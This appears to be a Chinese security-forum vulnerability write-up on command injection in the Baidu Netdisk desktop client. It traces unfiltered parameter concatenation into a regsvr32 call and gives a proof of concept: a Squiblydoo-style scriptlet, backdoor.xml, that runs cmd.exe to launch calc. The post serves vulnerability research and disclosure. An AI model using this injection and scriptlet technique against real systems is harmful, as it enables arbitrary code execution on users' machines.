-
-
[原创] 百度网盘命令注入/命令执行漏洞简单分析
-
发表于: 2025-9-4 22:57
-
b9dK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4x3U0N6Q4x3X3f1H3i4K6u0W2x3q4)9J5k6e0q4Q4x3@1p5I4x3o6l9H3x3q4)9J5c8W2)9K6c8X3#2W2N6r3S2G2k6q4)9K6c8p5!0H3k6h3&6e0j5h3k6W2b7X3!0^5i4K6t1$3j5h3#2H3i4K6y4n7N6h3E0Q4x3@1c8@1k6i4y4@1
通过端口占用找到目标进程
反编译目标二进制exe,根据浏览器返回内容定位到函数
通过动态调试可以得到v10的内容即为uk的值,sus函数非常可疑,使用x32dbg attach上去之后单步执行,执行过sus函数之后会弹出网盘主页面窗口,确定逻辑就在sus函数中。
使用同样的方法可以定位到逻辑在works函数中
在works函数中有两种方法调起网盘窗口
一种是窗口存在,直接发送信息将窗口调到最前面;
另一种是窗口不存在直接调用exe并且附加参数,uk作为其中一个参数附加在后面
显然没有经过过滤,导致了命令注入的发生
客户端的exe有一个特殊的参数-install regdll,可以调用regsvr32.exe进行dll注册,简单逆向分析可以找到处理逻辑:
首先会将参数接受的路径后拼接一个dll的名称,并验证是否存在,如果存在就进行注册操作
注册的命令也是简单的拼接,没有任何的过滤
构造payload可以让regsvr32.exe去调用其他的dll进行攻击,参考 squiblydoo。注入完成的的命令格式如下
最终poc:
996K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4x3U0N6Q4x3X3f1H3i4K6u0W2x3q4)9J5k6e0q4Q4x3@1p5I4x3o6l9H3x3q4)9J5c8W2)9K6c8X3#2W2N6r3S2G2k6q4)9K6c8p5!0H3k6h3&6e0j5h3k6W2b7X3!0^5i4K6t1$3j5h3#2H3i4K6y4n7N6h3E0Q4x3@1c8S2i4K6t1#2x3U0m8Q4x3X3c8A6L8Y4y4@1j5h3I4D9i4K6t1#2x3U0m8J5k6h3N6V1L8r3I4Q4x3U0f1J5x3q4)9J5y4e0t1J5b7#2)9K6b7g2)9#2b7#2)9#2b7%4N6A6L8X3c8G2N6%4y4Q4y4f1y4Q4y4f1y4K6P5i4y4@1k6h3@1K6x3W2)9#2b7#2)9#2b7%4y4U0M7X3!0T1K9W2)9J5k6h3c8D9L8q4)9#2b7#2)9J5y4e0t1J5i4K6t1#2x3U0m8Q4x3V1k6#2i4K6t1#2x3U0m8Q4x3V1k6A6i4K6y4m8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7i4@1f1$3i4K6W2o6i4K6S2p5i4@1f1#2i4K6S2m8i4@1p5I4i4@1f1#2i4K6V1&6i4@1p5^5N6i4u0D9i4K6t1$3k6%4c8Q4x3@1u0Q4x3V1k6T1j5h3y4C8k6r3!0G2M7W2)9J5k6i4S2E0L8q4)9J5y4e0t1H3i4K6g2o6i4K6g2o6i4K6u0W2i4K6u0W2i4K6g2o6i4K6g2o6i4K6u0W2i4K6u0W2i4K6g2o6i4K6g2o6i4K6u0W2i4K6u0W2i4K6g2o6i4K6g2o6i4K6u0W2i4K6u0W2i4K6g2o6i4K6g2o6i4K6u0W2i4K6u0W2i4K6g2o6i4K6g2o6i4K6u0W2i4K6u0W2i4K6g2o6i4K6g2o6i4K6u0W2i4K6u0W2i4K6g2o6i4K6g2o6g2i4y4W2M7Y4y4Q4y4f1y4Q4x3U0k6D9N6q4)9K6b7W2!0q4y4#2)9&6y4q4!0m8z5q4!0q4y4W2)9^5z5q4!0n7y4#2!0q4y4g2)9&6x3q4)9^5c8q4)9J5y4X3N6@1i4K6y4n7i4K6g2o6b7i4m8H3c8r3q4@1j5g2)9#2b7#2u0G2j5h3#2A6L8X3N6Q4y4f1y4T1j5h3W2V1N6g2)9#2b7@1u0S2K9h3c8#2e0X3g2@1k6r3W2K6K9H3`.`.backdoor.xml
<?xml version="1.0"?>
<scriptlet>
<registration
progid="poc"
classid="{10001111-0000-0000-0000-0000FEEDACDC}">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c calc.exe");
]]>
</script>
</registration>
</scriptlet>[培训]Windows内核深度攻防:从Hook技术到Rootkit实战!
最后于 2025-9-19 01:06
被/x01编辑
,原因:
|
|
|---|---|
